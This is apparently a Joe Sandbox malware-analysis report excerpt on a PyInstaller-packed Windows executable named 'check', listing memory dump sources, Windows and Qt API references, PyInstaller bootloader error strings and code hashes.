• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
• Instruction ID: 13a1cf9cfc0490d70509ab780e1adc8d9ddc2affd3ac70d1af915af003fb0ca4
• Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
• Instruction Fuzzy Hash: 83326021B0CEC251FB15FB2994553B9AA91AF847A0FC44072DE5D432D6EFACE96CC321

Control-flow Graph
[Control-flow graph starting at 7ff712516964; legend: Executed, Not Executed]
APIs
Memory Dump Source
• Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: 9d793bcebb9820c0151182275b16c511ee14b60cf496184f33455bab8c33df73
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: B1C1F036B28E428AEB10EFA5C4806AC7761FB49BA8F814275DE1E573D4DF78D059C320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction ID: f102be3be1262ad0f5a563cf48079da30169def0fb55f0480335955de7b6ac2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0AF36A18A4286F7A0AF64B4C8766B390AB84338F850635DE6D06AD4DFBCD45DCA04

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F7F90: _fread_nolock.LIBCMT ref: 00007FF7124F803A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF7124F1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                          • Instruction ID: d27cb7974da7f77c1c872de6d11cb7419305b0380561055176f6cf65dfd59ab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15817371A0CE8686EB20FF18D4806B9A391EF857A4F844431DD8D47785EEBCE959C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                          • Instruction ID: 12498d1b4611b6e0778587e2eb5e10dd099d62bb3fdbc7242728264058f333fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF415121B08E4296EB10FF2598405B9E390EF857A4FC44532ED4D17B95EEBCE91AC724

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                          • Instruction ID: 66b2bf1aa586a7680bc42a5a2c4e1161d98b0d99462cbac5181fddeb7c46a5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51D322A08E4241EB21BF15A8803BAA291FFC67A4FC44131ED4D477C5EEBCE959C720

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction ID: 71ae712518d8870dd7aabf1224259b029d151d58a96f7cdde2afdbf427693f4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47219A61B1CD4241FB20BB28E8513B6A290BFC8375FC04132DD5D865D5EEACE91CC725

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                          • Instruction ID: dbf2165508bec93022408576bb2ce849e5e57425963a01dc0b1fc0921d9529a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC1732291CE8692E660AF1598C02BDEB50FB81BA0FD54171DA4D07791FEBCE84DC729

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                          • Instruction ID: 6b512ee778843bde89a94887bd7764f28a15c249cf3df864ed2e555e5212250d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E413D31A18E8691EB15FB28E4542E9A351FB843A4FC00132DE5D476D9EFBCE92DC760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                          • Instruction ID: 535e2e6bbd25dab220523e110017ed2f99b14c9072e0b083cbbc7d43a65f34d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41B822D18B8183E710AF60A994379B760FB943B8F509375E65C03AD1EFBCA5E4C714

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocPainterPath@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: J9J9
                                                                                                                                                                                                                                          • API String ID: 3358426265-2881787613
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABC6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction ID: 807d283c6d46c8578195bd9ad7c5dd053b7dc14f7b4dbc7905097ca23d2b7aca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41D932918A4187EA34AF15A9C117DF3A0EF55760F900271DB8E437D1EFACE406CB64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                          • Instruction ID: dc2fab82c7131c1c93b3e53a6d7214cbf5fb84bef2b2eaf11938beafa19e844f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621B421B18E614AFB10BB2668443BAD641BF85BE4FC94430EF0C0BB86DEBDE459C614
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                          • Instruction ID: 2ae686ea682cbb24d85f2482c8eb0fa15b5478519b761845d40d3db79d611166
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2313E22E18E0285E6117F558CC137DAA90AB80BB4FC145B5EA5D473D2FEFCA449C739
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 47145432ae132e9ac4b2a32f75bf4bfb0f4d69de619122aa562669d37b36c054
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7118731A1CA4141EA60BF11A88017DE664FF85BA8FC444B1FB8C57B96EFBCD404C768
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QPainter@@QEAA@PEAVQPaintDevice@@@Z.QT5GUI ref: 00007FF89D9BB593
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Device@@@PaintPainter@@malloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 45773141-0
                                                                                                                                                                                                                                          • Opcode ID: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                                          • Instruction ID: a12e3e8aa216b6d5b5e0f4f55f367061310cdbd6bbcad3c1ed64c05f5344cbfc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25211D33A08B8185EB608B12F44126E67A5FB88FD4F488135EECE57B68EF3CE1518704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
